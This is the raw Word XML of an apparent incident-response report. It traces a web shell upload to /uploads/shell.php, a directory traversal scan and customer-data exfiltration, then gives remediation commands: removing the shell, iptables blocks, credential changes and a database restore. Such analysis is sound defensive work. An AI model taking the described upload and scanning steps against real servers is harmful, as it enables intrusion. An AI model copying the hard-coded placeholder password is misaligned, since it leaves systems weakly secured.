        <w:t xml:space="preserve"> status code. This suggests that the directory is accessible and may be writable.</w:t>
      </w:r>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="244"/>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21:58:40</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: The attacker makes a GET request to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">/upload.php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, which returns a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">200 OK</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> status code. This could indicate that the attacker is probing for a file upload vulnerability.</w:t>
      </w:r>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="141"/>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3. Web Shell Upload (21:58:55 - 21:59:04)</w:t>
      </w:r>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24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21:58:55</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: The attacker accesses the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">/uploads/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> directory again, this time using the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">curl/7.68.0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> user agent. This suggests that the attacker is preparing to upload a malicious file.</w:t>
      </w:r>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="245"/>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21:59:04</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: The attacker makes a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">POST request</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">/uploads/shell.php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, which returns a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">200 OK</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> status code. This is highly suspicious and indicates that the attacker may have successfully uploaded a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">web shell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> to the server.</w:t>
      </w:r>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="140"/>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8"/>
        </w:rPr>
        <w:t xml:space="preserve">Updated Analysis</w:t>
      </w:r>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="141"/>
        <w:pBdr>
          <w:top w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:left w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:bottom w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:right w:val="none" w:color="000000" w:sz="4" w:space="0"/>
        </w:pBdr>
        <w:spacing/>
        <w:ind w:right="0" w:firstLine="0" w:left="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Key Findings</w:t>
      </w:r>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="246"/>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Bot Activity</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="247"/>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SiteCheckerBotCrawler</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> traffic appears to be benign but should still be monitored to ensure it does not overwhelm the server or access sensitive resources.</w:t>
      </w:r>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="248"/>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Suspicious Scanning</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="249"/>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The IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">138.68.92.163</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> conducted a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">directory traversal attack</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, attempting to access numerous common paths and directories. This is a common tactic used by attackers to find vulnerabilities or sensitive files.</w:t>
      </w:r>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="250"/>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Web Shell Upload</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="251"/>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The POST request to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">/uploads/shell.php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a strong indicator that the attacker has successfully uploaded a malicious script. A web shell can allow the attacker to execute arbitrary commands on the server, potentially leading to full server compromise.</w:t>
      </w:r>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="252"/>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b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Vulnerable Uploads Directory</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="253"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:left w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:bottom w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:right w:val="none" w:color="000000" w:sz="4" w:space="0"/>
        </w:pBdr>
        <w:spacing/>
        <w:ind w:right="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">/uploads/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> directory appears to be accessible and writable, which is a significant security risk. Attackers often target such directories to upload malicious files.</w:t>
      </w:r>
      <w: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4. Assess Impact</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impact of the incident can be assessed based on the following factors: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Data Breach:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22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Accessed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: The attacker accessed and exfiltrated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which contains sensitive customer information, including names, phone numbers, addresses, and purchase history.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22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Data Tampering</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: There is no evidence of data tampering in the database logs. The attacker focused on exfiltrating data rather than modifying or deleting it.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Potential Impact:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22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Customer Privacy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: The exfiltration of customer data poses a significant risk to customer privacy. The stolen data could be used for identity theft, phishing, or other malicious activities.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22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Reputation Damage</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: The breach could damage the company's reputation, leading to a loss of customer trust and potential legal consequences.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22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Financial Impact</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: The company may face financial losses due to regulatory fines, legal fees, and the cost of incident response and remediation.</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Remediation Process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To address the security incident and prevent future attacks, the following </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">remediation process</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> is recommended. This process is divided into </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">immediate actions</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forensic analysis</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long-term security improvements</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">ongoing monitoring</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1. Immediate Actions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goal of immediate actions is to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">contain the incident</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prevent further damage</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">secure the environment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1.1. Contain the Attack</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Disable the Web Shell</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Locate and remove the malicious file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 from the web server.</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Ensure that no other malicious files or backdoors are present in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 or elsewhere on the server.</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remove the file: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rm /var/www/html/uploads/shell.php</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Block Attacker IPs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Add the attacker's IP addresses (e.g., </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">138.68.92.163</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178.62.228.28</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">) to the firewall's blocklist.</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block an IP using </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">iptables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iptables -A INPUT -s 138.68.92.163 -j DROP iptables -A INPUT -s 178.62.228.28 -j DROP</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Change Compromised Credentials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Change all database credentials, especially for the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">root</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users.</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Ensure that new passwords are strong and unique.</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change a MySQL user password:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22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ALTER USER 'phl'@'localhost' IDENTIFIED BY 'NewStrongPassword123!';</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1.2. Secure the Database</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Disable TELNET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Disable TELNET on the database server and replace it with SSH for secure remote access.</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disable TELNET:</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systemctl stop telnet</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systemctl disable telnet</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Restrict Database Access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Limit database access to specific IP addresses or subnets.</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MySQL configuration to restrict access:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22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GRANT ALL PRIVILEGES ON phl.* TO 'phl'@'10.10.1.2' IDENTIFIED BY 'NewStrongPassword123!';</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1.3. Restore from Backup</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22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Restore the Database</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Restore the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">customers</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> table and other affected data from a known good backup.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22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Verify the integrity of the restored data to ensure no tampering occurred.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22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restore a MySQL database from a backup:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22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mysql -u root -p phl &lt; /path/to/backup/phl_backup.sql</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2. Forensic Analysis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goal of forensic analysis is to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">understand how the attack occurred</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">identify the attack vector</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
